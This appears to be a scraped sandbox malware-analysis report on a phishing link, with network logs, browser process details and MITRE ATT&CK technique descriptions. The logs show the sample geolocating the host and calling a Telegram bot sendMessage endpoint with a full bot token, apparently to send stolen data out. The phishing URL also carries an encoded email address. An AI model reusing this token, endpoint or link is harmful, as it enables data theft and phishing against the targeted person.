2025-03-13 06:36:09 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 311 content-type: application/json; charset=utf-8 date: Thu, 13 Mar 2025 06:36:08 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-03-13 06:36:09 UTC	311	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 32 30 36 2e 32 35 35 2e 31 36 33 2e 31 39 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 66 6f 72 65 73 74 30 32 63 70 65 2e 31 39 38 2e 31 36 33 2e 32 35 35 2e 32 30 36 2e 61 72 6b 2e 63 61 62 6c 65 6c 79 6e 78 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 57 79 6e 6e 65 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 41 72 6b 61 6e 73 61 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 33 35 2e 32 32 34 35 2c 2d 39 30 2e 37 38 36 38 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 31 36 35 31 20 43 61 62 6c 65 6c 79 6e 78 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 37 32 33 39 36 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 Data Ascii: { "ip": "206.255.163.198", "hostname": "forest02cpe.198.163.255.206.ark.cablelynx.com", "city": "Wynne", "region": "Arkansas", "country": "US", "loc": "35.2245,-90.7868", "org": "AS1651 Cablelynx", "postal": "72396", "timezone": "America

Timestamp	Bytes transferred	Direction	Data
2025-03-13 06:36:12 UTC	441	OUT	GET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1 Host: api.telegram.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 06:36:12 UTC	346	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 13 Mar 2025 06:36:12 GMT Content-Type: application/json Content-Length: 80 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-03-13 06:36:12 UTC	80	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}

Target ID:	1
Start time:	02:34:48
Start date:	13/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff65fe40000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	2
Start time:	02:34:52
Start date:	13/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,12922102568577335024,13240247092001205666,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2160 /prefetch:3
Imagebase:	0x7ff65fe40000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	3
Start time:	02:34:55
Start date:	13/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,12922102568577335024,13240247092001205666,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4680 /prefetch:8
Imagebase:	0x7ff65fe40000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	6
Start time:	02:34:59
Start date:	13/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg=="
Imagebase:	0x7ff65fe40000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 88

Chrome Cache Entry: 89

Chrome Cache Entry: 90

Chrome Cache Entry: 91

Chrome Cache Entry: 92

Chrome Cache Entry: 93

Chrome Cache Entry: 94

Chrome Cache Entry: 95

Chrome Cache Entry: 96

Chrome Cache Entry: 97

Chrome Cache Entry: 98

Chrome Cache Entry: 99

Static File Info

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre